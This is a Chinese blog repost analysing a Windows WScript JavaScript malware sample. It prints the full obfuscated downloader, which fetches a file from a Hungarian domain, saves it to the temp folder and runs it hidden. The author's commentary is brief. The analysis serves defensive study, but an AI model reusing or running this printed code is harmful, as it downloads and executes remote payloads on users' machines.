windows脚本wscript恶意程序样本逆向分析

最新推荐文章于 2021-04-25 09:22:52 发布
最新推荐文章于 2021-04-25 09:22:52 发布
阅读量603 收藏
点赞数
分类专栏: 恶意代码分析实战 文章标签: wscript 恶意程序

转自:http://blog.csdn.net/microzone/article/details/52233649 作者:5t4rk

0x01 基本分析

File: inv_36f5e7.js
Size: 5942 bytes
Modified: 2016年8月17日, 18:54:00
MD5: C533B463D5598971BB32C1F743DDCC00
SHA1: C428931655EDE93A162B347525F5095FA78A454C
CRC32: 8CCB751D


0x02 恶意代码

[javascript]  view plain  copy
 print ? 在CODE上查看代码片 派生到我的代码片
  1. var oVFDA = "sdf";  
  2. var EqgwssuzDk = "i";  
  3. var CbMBFrpAenNixzr = "h";  
  4. var yZkyvpryerzo = "yau";  
  5. var OWfFyitBNfkGS = "sdf";  
  6. var EvKJKTni = "g";  
  7. var YED = "o";  
  8. var vrbkQrmZz = "a7";  
  9. var bSsgh = "d8f";  
  10. var VYq = "s";  
  11. var GqlRwYwyNRjmTXO = "7hg";  
  12. var HFaPeXFfQf = "u";  
  13. var pGJyKMNeMeSz = "dfa";  
  14. var pAHggazU = "aos";  
  15. var xeDmnRN = "kj";  
  16. var TkioFGwdqECzf = "lf";  
  17. var IvPA = "sd;";  
  18. var HGddEOIyEGlKqD = "a";  
  19. var RbAPg = "sdf";  
  20. var DweZT = "i";  
  21. var nooWw = "h";  
  22. var UOxiWTJeveTmc = "au";  
  23. var GGq = "fy";  
  24. var CZrdIAVaegI = "gsd";  
  25. var xBbxlkaid = "7o";  
  26. var xJk = "fa";  
  27. var lrrwKaQ = "8";  
  28. var tofjOwTTPqM = "gsd";  
  29. var jEkcPFPSClJy = "7h";  
  30. var dDdBSo = "au";  
  31. var MEKSkHWtXrXoq = "df";  
  32. var kRtwsMEVOvikhF = "aos";  
  33. var konDHgULOMLl = "kj";  
  34. var HwhuZGGGz = ";lf";  
  35. var QBGEkEyKTteSIFE = "sd";  
  36. var dxgAcnIaWaT = "a";  
  37. var npimEHxyw = "f";  
  38. var gzxAaIuOe = "d";  
  39. var glyIl = "is";  
  40. var vbXMnALqxJBTr = "uh";  
  41. var gfFVKDRDHlxh = "a";  
  42. var YRIeFmpyL = "y";  
  43. var Hsxi = "sdf";  
  44. var NBNVa = "7og";  
  45. var DGqwnJBYAr = "a";  
  46. var hXk = "d8f";  
  47. var YRNkBZkjVUGix = "hgs";  
  48. var nJeBUHrKmk = "7";  
  49. var BRYybtRzxHbq = "u";  
  50. var YnDofAgHjZLXTwL = "fa";  
  51. var kaJShal = "d";  
  52. var fxOc = "os";  
  53. var lKqmYlqyawDnPk = "kja";  
  54. var uNcGe = "lf";  
  55. var FLQDqhBNnjk = "d;";  
  56. var TvLqeh = "as";  
  57. var qFo = "e";  
  58. var OZGbRIQVppIwJ = "os";  
  59. var fDUqIyLO = "cl";  
  60. var KIPIrWHXsdgcjhF = "e";  
  61. var ofBSJENQVY = "Fil";  
  62. var jhmP = "o";  
  63. var shE = "eT";  
  64. var pCDcoO = "v";  
  65. var grHAZU = "Sa";  
  66. var ZwBDHN = "n";  
  67. var fzL = "o";  
  68. var sxFrtUgpGCEifOx = "i";  
  69. var HROa = "t";  
  70. var Hfuv = "i";  
  71. var HhIOUuVwmtFlbtA = "os";  
  72. var JSyyTjZmGqBZwN = "p";  
  73. var YPpqq = "te";  
  74. var uQtDLJnmFzR = "wri";  
  75. var zCnbEiZVwMiA = "pe";  
  76. var mvqWxpA = "ty";  
  77. var zzXzkEpTxO = "en";  
  78. var pFLxXyd = "p";  
  79. var MTfggvfPTyT = "o";  
  80. var KfyjmYkEKyLx = "m";  
  81. var aHQYUcaVlUQ = "rea";  
  82. var VoFg = "t";  
  83. var xTCoqvmVK = "S";  
  84. var CNfbwIDnKCJ = ".";  
  85. var uYU = "DB";  
  86. var fFDMGjDtbjfDF = "O";  
  87. var RMplJWcHEVBva = "AD";  
  88. var RNCQbKNaOibbTl = "ct";  
  89. var EMFHhMe = "je";  
  90. var GaeRpeLYCwKeEC = "eOb";  
  91. var ACHlTpc = "t";  
  92. var biNKioucc = "ea";  
  93. var aYSkIHN = "Cr";  
  94. var ICjmvAisL = "h4";  
  95. var aEr0 = "n4";  
  96. var MNnRRgRcnPquuz = "j6";  
  97. var YrkHeRxNcrvLD = "0k6";  
  98. var GkO = "hu/";  
  99. var cpEzVKLF = "l.";  
  100. var ZaQRCrwuBRfemMj = "ta";  
  101. var nXmUKyNe = "por";  
  102. var UcAIGgT = "gy";  
  103. var JRGbuChEIxq = "vje";  
  104. var UoUZIHURnralKh = "ne";  
  105. var ZkWZmYmexUdi = "w.";  
  106. var rpdWQwC = "ww";  
  107. var AOuPR = "/";  
  108. var nLpcsaMNDX = ":/";  
  109. var ZTxmNnUJLtPPC = "ttp";  
  110. var OxIajXRPSVa = "h";  
  111. var yVwM = "GET";  
  112. var yFZAdJ = "n";  
  113. var STz = "ope";  
  114. var onrpWtwXwgwLZP = "e";  
  115. var xYlXNtDRSZu = "ex";  
  116. var qPstEQFAMJHLr = "t.";  
  117. var tNixekYOZqcy = "I";  
  118. var YPOKzIhmiBkdG = "qs";  
  119. var UcOH = "2Xp";  
  120. var CMmsXjM = "m";  
  121. var QrywMxwtxaCEC = "%/";  
  122. var gIEqprqVOtlKtL = "P";  
  123. var SotUSdXog = "EM";  
  124. var WvqJvwrjlrY = "%T";  
  125. var JTbat = "s";  
  126. var PtOsPvJH = "g";  
  127. var ViiBnvJlfWUdhl = "in";  
  128. var iliEPeW = "tr";  
  129. var CmkLzTNEUf = "ntS";  
  130. var lkbyPygIhjm = "me";  
  131. var BGZCgLI = "ron";  
  132. var OQvyGswz = "nvi";  
  133. var jATLqdGXmuKKYMM = "E";  
  134. var OnCqpejicsbs = "and";  
  135. var OgwgCQuslbYE = "p";  
  136. var lWDmjSKUCrG = "Ex";  
  137. var eSfpjes = "P";  
  138. var qiIBBwTIjOPjGi = "HTT";  
  139. var jtaGAmHFz = "XML";  
  140. var VNpjktQlhr = "2.";  
  141. var vExUuOaRJUo = "ML";  
  142. var hkQYQQyQIIP = "SX";  
  143. var TkqreSKtbpOfyb = "M";  
  144. var RQwrKfLavgwJtWC = "un";  
  145. var RtQNL = "R";  
  146. var CFnecv = "l";  
  147. var hxgNojMPu = "l";  
  148. var uzMNS = "he";  
  149. var fOV = "t.S";  
  150. var xXXE = "ip";  
  151. var TdlRpCiUZgx = "cr";  
  152. var fsCFTGEb = "WS";  
  153. var yiiZpVegzCCZf = "t";  
  154. var KTtBpdR = "c";  
  155. var kePFmBQQenw = "je";  
  156. var hFarMMFi = "Ob";  
  157. var JqtZh = "e";  
  158. var WbHjmwvNlDAiIto = "t";  
  159. var vmj = "rea";  
  160. var MWhy = "C";  
  161. var lewy = new Date();  
  162. var JpCLwbk = lewy.getMilliseconds();  
  163. WScript.Sleep(10);  
  164. var lewy = new Date();  
  165. var amtDmXHniaHq = lewy.getMilliseconds();  
  166. WScript.Sleep(10);  
  167. var lewy = new Date();  
  168. var Uwj = lewy.getMilliseconds();  
  169. WScript.Sleep(10);  
  170. var lewy = new Date();  
  171. var YhfbOZ = lewy.getMilliseconds();  
  172. var kgea = amtDmXHniaHq - JpCLwbk;  
  173. var EqLhv = Uwj - amtDmXHniaHq;  
  174. var qxHRARFzWjTBRjC = YhfbOZ - Uwj;  
  175. WshShell = WScript[MWhy + vmj + WbHjmwvNlDAiIto + JqtZh + hFarMMFi + kePFmBQQenw + KTtBpdR + yiiZpVegzCCZf](fsCFTGEb + TdlRpCiUZgx + xXXE + fOV + uzMNS + hxgNojMPu + CFnecv);  
  176. function urLi(IecREUsCLsZ){WshShell[RtQNL + RQwrKfLavgwJtWC](IecREUsCLsZ, 0, 0);}  
  177. function gxUedR(n){return TkqreSKtbpOfyb + hkQYQQyQIIP + vExUuOaRJUo + VNpjktQlhr + jtaGAmHFz + qiIBBwTIjOPjGi + eSfpjes;}  
  178. if ((kgea != EqLhv) || (EqLhv != qxHRARFzWjTBRjC)){sSJOsjbTF = WshShell[lWDmjSKUCrG + OgwgCQuslbYE + OnCqpejicsbs + jATLqdGXmuKKYMM + OQvyGswz + BGZCgLI + lkbyPygIhjm + CmkLzTNEUf + iliEPeW + ViiBnvJlfWUdhl + PtOsPvJH + JTbat](WvqJvwrjlrY + SotUSdXog + gIEqprqVOtlKtL + QrywMxwtxaCEC) + CMmsXjM + UcOH + YPOKzIhmiBkdG + tNixekYOZqcy + qPstEQFAMJHLr + xYlXNtDRSZu + onrpWtwXwgwLZP;  
  179.  VcmpOhXAkWS = gxUedR(0);  
  180.  fgRtFR = WScript.CreateObject(VcmpOhXAkWS);  
  181. fgRtFR[STz + yFZAdJ](yVwM, OxIajXRPSVa + ZTxmNnUJLtPPC + nLpcsaMNDX + AOuPR + rpdWQwC + ZkWZmYmexUdi + UoUZIHURnralKh + JRGbuChEIxq + UcAIGgT + nXmUKyNe + ZaQRCrwuBRfemMj + cpEzVKLF + GkO + YrkHeRxNcrvLD + MNnRRgRcnPquuz + aEr0 + ICjmvAisL, false);  
  182. fgRtFR.send();  
  183. while (fgRtFR.readystate < 4 ) {WScript.Sleep(1000)};  
  184. wrZOz = WScript[MWhy + vmj + WbHjmwvNlDAiIto + JqtZh + hFarMMFi + kePFmBQQenw + KTtBpdR + yiiZpVegzCCZf](RMplJWcHEVBva + fFDMGjDtbjfDF + uYU + CNfbwIDnKCJ + xTCoqvmVK + VoFg + aHQYUcaVlUQ + KfyjmYkEKyLx);  
  185. wrZOz[STz + yFZAdJ]();  
  186. wrZOz[mvqWxpA + zCnbEiZVwMiA] = 1;  
  187. wrZOz[uQtDLJnmFzR + YPpqq](fgRtFR.ResponseBody);  
  188. wrZOz[JSyyTjZmGqBZwN + HhIOUuVwmtFlbtA + Hfuv + HROa + sxFrtUgpGCEifOx + fzL + ZwBDHN] = 0;  
  189. wrZOz[grHAZU + pCDcoO + shE + jhmP + ofBSJENQVY + KIPIrWHXsdgcjhF](sSJOsjbTF, 2 );  
  190. wrZOz[fDUqIyLO + OZGbRIQVppIwJ + qFo]();  
  191. urLi(sSJOsjbTF);  
  192. kgea = "asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf" + amtDmXHniaHq + JpCLwbk;  
  193. EqLhv = "asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf" + Uwj + amtDmXHniaHq;  
  194. qxHRARFzWjTBRjC = "asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf" + YhfbOZ + Uwj;  
  195. }  


0x03 还原后的代码


其实编码并不复杂,只是进行了大量的代码数据和字符串替换。

主要功能如下


标准的恶意程序下载者,不懂下载者的可以百度。


关键位置标记,hu.域名。来自匈牙利的国家一级域名。看来是个国外黑客。


0x04 信息追踪


dns查询


whois查询




0x05  其他信息


           搜索有没有其它已披露恶意CC服务器,发现其还有勒索病毒回连。


0x06 参考知识点


http://www.jb51.net/shouce/xmlhttp/
http://www.jb51.net/article/50712.htm

Ivw_IT
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2022年最强万能crc32爆破脚本
04-11
2022年最强万能crc32爆破脚本,支持各种类型的图片格式例如:JPG、PNG、bmp、GIF等。
Microsoft Windows 脚本技术(包括JavaScript, VbScript WScript)
10-21
Microsoft Windows 脚本技术(包括JavaScript, VbScript WScript)
恶意代码--windows脚本wscript恶意样本逆向分析
关注互联网安全的小虾米一枚
08-17 2826
0x01 基本分析 File: C:\Users\luke\Desktop\finance\inv_36f5e7.js Size: 5942 bytes Modified: 2016年8月17日, 18:54:00 MD5: C533B463D5598971BB32C1F743DDCC00 SHA1: C428931655EDE93A162B347525F5095FA78A454C C
microsoft windows 脚本技术教程-综合文档
05-23
VBScript是微软开发的,广泛应用于ActiveX Document、Internet Explorer以及Windows脚本宿主(WScript或CScript)。JScript则与JavaScript相似,但由微软为Windows环境定制。了解这两种脚本语言的基本语法、变量、...
windows程序自启动
01-21
通过这种方式,我们不仅能够实现Windows程序的自启动,还能通过Python脚本进行批量处理,这对于需要管理多个自启动程序的情况非常有用。同时,结合Windows任务计划程序或定时任务,还可以实现更复杂的启动逻辑,如按...
WINDOWS脚本技术手册
04-23
WINDOWS脚本技术手册》是一本全面覆盖Windows脚本编程技术的权威指南,它深入浅出地介绍了在Windows操作系统环境中,如何利用各种脚本语言进行系统管理和自动化操作。手册不仅涵盖了JScript、VBScript这两种主要的...
定时重启程序脚本 定时重启程序
01-07
4. **设置计划任务**:为了使`delay.vbs`在系统启动时自动运行,我们可以使用Windows的任务计划程序来调度这个脚本。通过`schtasks`命令或者在任务计划程序界面中添加一个新的任务,设置触发器为启动时或者按照特定...
如何修复:Windows上面的WScript脚本(.vbs)不能执行了?
白日放歌须纵酒,青春作伴好还乡。
02-23 4594
错误描述:当执行用VBScript写的WScript脚本时,出现了下面的错误:        There is no script engine for file extension ".vbs". 或是        找不到 .vbs 的执行引擎修复方法:    找到%WINDIR%/INF/WSH.inf,然后按右键,选择“安装”即可!    重启电脑!
直播部分代码
王兆镇的博客
04-25 1404
<?php namespace app\api\controller; use app\common\business\Live as LiveBus; use app\common\business\User; use app\common\lib\CodeResponse; use app\common\lib\im\Tencent\TencentIm; use app\common\lib\live\Tencent\TencentLive; use app\common\lib\Sho
在线CRC32网站
热门推荐
冷饮
07-30 1万+
由于用到STM32的CRC32硬件,发现直接CRC出来的结果,跟PC端的工具不一致.因此,在21论坛看到,这两个不错的验证CRC算法的在线网站. CRC32验证 CRC32验证
windows编程四大常用代码,恶意软件常用最后两点
莫影 is Joker
03-20 358
Hello Boy 今天和大家讲讲,在做windows编程常用的三个短小代码。对于平时没用过这些代码的人,或许你可以考虑试着去看看在实践中能否用的上这些代码来处理实际问题或者实际需求。 First:透明窗口 windows透明窗口,让窗口透明,如下图。 行文不易,新手上路,多多关注,这真的对我很重要,私信更有惊喜 Second:全屏幕显示窗体 全屏幕显示窗体:很...
WshShell 对象说明
月影的专栏
04-28 4410
属性 说明 Environment 返回 WshEnvironment 集合对象。 SpecialFolders 使用 WshSpecialFolders 对象提供对 Windows shell 文件夹的访问,如桌面文件夹,开始菜单文件夹和个人文档文件夹。 下表说明和 WshShell 对象有关的方法。方法 说明 CreateShortcut 创建并返回 WshShortcut 对象。 E
使用 WScript.exe 运行脚本
weixin_34010566的博客
01-15 384
WScript.exe 是 Windows 脚本宿主的一个版本,用来在 Windows 中运行脚本。WScript.exe 提供了基于 Windows 的对话框,用于设置脚本属性。 使用 WScript.exe,可以通过下列方式在 Windows 下运行脚本: 双击文件或图标。包括:“我的计算机”、“Windows 资源管理器”、“查找”窗口、“开始”菜单或桌面上的文件或图标。 ...
【转】CRC原理及其逆向破解方法
dabang_007的专栏
09-24 1万+
转自:http://blog.163.com/j_drew/blog/static/11601844200692681123935/ 介绍: 这篇短文包含CRC原理介绍和其逆向分析方法,很多程序员和破解者不是很清楚了解 CRC的工作原理,而且几乎没人知道如何逆向分析它的方法,事实上它是非常有用的. 首先,这篇教程教你一般如何计算CRC,你可以将它用在数据代码保护中.第二
大学生挑战杯-喜树根器官培养和抗癌物质喜树碱生成的研究.rar
07-26
大学生挑战杯-喜树根器官培养和抗癌物质喜树碱生成的研究.rar
b278视频及游戏管理平台-springboot+vue.zip(可运行源码+sql文件+)
最新发布
07-26
视频及游戏管理平台是一个很好的项目,结合了后端(Spring Boot)和前端(Vue.js)技术,实现了前后端分离。 视频及游戏管理平台是一个很好的项目,结合了后端(Spring Boot)和前端(Vue.js)技术,实现了前后端分离。 视频及游戏管理平台是一个很好的项目,结合了后端(Spring Boot)和前端(Vue.js)技术,实现了前后端分离。 视频及游戏管理平台是一个很好的项目,结合了后端(Spring Boot)和前端(Vue.js)技术,实现了前后端分离。 视频及游戏管理平台是一个很好的项目,结合了后端(Spring Boot)和前端(Vue.js)技术,实现了前后端分离。 视频及游戏管理平台是一个很好的项目,结合了后端(Spring Boot)和前端(Vue.js)技术,实现了前后端分离。
Windows脚本编程:入门与实战指南
本教程名为"Windows_脚本编程.ppt",主要针对Windows系统脚本编程进行深入讲解。脚本编程在Windows环境中扮演着重要角色,它是一种通过文本编辑器创建并以特定文件扩展名(如.js、.vbs)保存的普通文本文件,可以...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值